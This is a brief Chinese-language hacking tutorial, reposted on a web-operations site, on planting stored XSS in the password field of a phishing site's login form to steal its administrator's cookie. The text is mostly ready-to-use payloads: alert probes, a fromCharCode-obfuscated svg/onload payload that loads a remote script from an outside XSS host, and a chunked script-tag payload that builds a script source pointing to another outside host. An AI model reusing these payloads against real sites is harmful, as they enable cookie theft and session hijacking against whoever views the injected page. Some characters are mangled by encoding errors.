時間:2023-05-12 03:57:01 | 來源:網(wǎng)站運營
時間:2023-05-12 03:57:01 來源:網(wǎng)站運營
攻破黑市最流行的釣魚網(wǎng)站(第二彈):上次有人向我反映,我講的過于快了,不適合菜鳥看,所以這次我寫的相對來說比較詳細~ 這對于有基礎(chǔ)的人來說可能比較煎熬,哈哈。大家秒懂的部分可以跳過~~user=123123112312&password=123123"><img/src=1 onerror=alert("1">//&submit=%E7%99%BB%E5%BD%95
"> 是閉合標簽<img/src=1 onerror=alert("1"> 是彈窗//為注釋掉后面的語法user=123123112312&password=123123"><style/onload=alert(1)>//&submit=%E7%99%BB%E5%BD%95
這次進到后臺查看“><img/src=1/>//
紅色的”>部分為閉合前邊的標簽黃色的// 為注釋掉后面的語句<img/src=1/> 這句代碼主要就是引用我們XSS平臺的代碼,主要達到一個盜取對方cookie的效果"><svg/onload=eval((String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,118,47,88,65,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59)))>//
再次請求數(shù)據(jù),把這段payload 放到 password 參數(shù)里,<script>z='document'</script> <script>z=z+'.write("'</script> <script>z=z+'<script'</script> <script>z=z+' src=ht'</script> <script>z=z+'tp://xss'</script> <script>z=z+'.sssie'</script> <script>z=z+'.com/F'</script> <script>z=z+'MD27h'</script> <script>z=z+'></sc'</script> <script>z=z+'ript>")'</script> <script>alert(z)</script> <script>eval(z)</script>
逐個放進去即可 然后就拿到了對方的cookie關(guān)鍵詞:魚網(wǎng),黑市,流行,攻破
微信公眾號
版權(quán)所有? 億企邦 1997-2025 保留一切法律許可權(quán)利。